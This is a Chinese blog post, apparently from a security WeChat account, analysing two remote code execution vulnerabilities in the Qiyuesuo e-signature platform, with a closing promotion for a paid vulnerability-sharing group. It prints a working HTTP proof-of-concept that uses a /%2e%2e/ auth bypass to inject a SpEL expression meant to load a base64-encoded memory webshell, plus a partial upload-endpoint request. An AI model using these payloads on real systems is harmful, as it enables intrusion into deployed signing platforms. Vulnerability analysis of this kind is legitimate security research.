契约锁漏洞,攻击者可构造恶意请求获取系统信息等及其它安全风险。目前网上流传一些关于契约锁漏洞,现也抽出一些时间对契约锁漏洞进行漏洞分析。
1.契约锁电子签章平台远程代码执行漏洞
POST /captcha/%2e%2e/template/html/add HTTP/1.1
Host: xxx
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows
NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
{"file":"abc","title":"abc","params":[{"extensionParam":"{"expression":"var
a=new org.springframework.expression.spel.standard.SpelExpressionParser();var
b='base64 编码后的内存马 ';var
b64=java.util.Base64.getDecoder();var deStr=new
java.lang.String(b64.decode(b),'UTF-8');var
c=a['parseExpression'](deStr);c.getValue();"}","name":"test"}]}
我们根据漏洞poc来看,很明显是使用了../进行了跨目录进行权限绕过,经查阅资料使用/%2e%2e/绕过权限限制,简要说明是由于Spring框架使用了alwaysUseFullPath为默认值false,这会使得其获取ServletPath(后台路径),所以在路由匹配时相当于会进行路径标准化包括对%2e解码以及处理跨目录,从而绕过拦截器对../的限制。
参考:https://mp.weixin.qq.com/s/EQSbhpypUVOyyvxbWVVc1g
受影响URL:
/captcha/%2e%2e/template/html/add
简述:契*锁漏洞,攻击者可构造恶意请求获取系统信息,造成数据系统及其它安全风险。
调试分析
接下来我们可定位真实路由:/template/html/add,全局搜索“template”关键字查找Controller,可定位
com.qiyuesuo.api.TemplateHtmlController
往下跟进发现/html/add 路由,发现 addHtmlTemplate()方法
发现该方法所需的参数与poc中的参数类似,进一步确定该漏洞存在该方法中,构造TemplateBean,根据代码看出TemplateBean,file(127行),title(128行),params(162行),extensionParam(170行),name(183行)
继续跟进到checkExpression()方法,发现存在代码执行函数eval,流程结束.
然后逐个跟进,最后确定/html/add 路由下调用了该方法
1.契约锁upload代码执行漏洞
POST /login/%2e%2e/utask/upload HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X10_10_2) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/49.0.818.0 Safari/531.2
Content-Type: multipart/form-data;
***
受影响URL:
/login/%2e%2e/utask/upload
简述:契*锁upload代码执行漏洞,攻击者可构造恶意请求获取系统信息,造成数据系统及其它安全风险。
调试分析
同样根据路径确定Controller
跟进upload,发现该方法主要实现上传自定义代码,在未出补丁之前这块存在任意文件上传漏洞,不过应该是全修复了
跟进this.userTaskService.uploadFile(sourceCode);
跟进this.customCodeStrategyManager.compileCustomCode,即使传txt,只要符合java代码格式即可编译成java代码造成命令执行漏洞。
补丁分析
专注于漏洞情报分享,不发烂大街的东西。星球外面的兄弟欢迎进来白嫖,不满意三天退款。放心大胆的进来嫖。
(星球内部分工具脚本截图)
星球活跃度
精选主题一
精选主题二
精选主题三
精选主题四
精选主题五
马赛克安全实验室专注于:漏洞复现、渗透测试、nday、0day、网络安全、红蓝对抗,持续输出安全相关漏洞情报、漏洞复现相关漏洞验证脚本及工具。
工具列表(点击可直接查看)
[安全工具开发-1]MOSAIC HongJing Crypt Tools V1.0
复现列表(点击可直接查看)
[漏洞复现-21]蓝*OAE*S-saveImg-文件上传漏洞
[漏洞复现-34]Huawei Auth-Http文件泄露漏洞
原文始发于微信公众号(thelostworld):[漏洞分析-1]契*锁远程代码执行漏洞&upload代码执行漏洞利用分析调试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论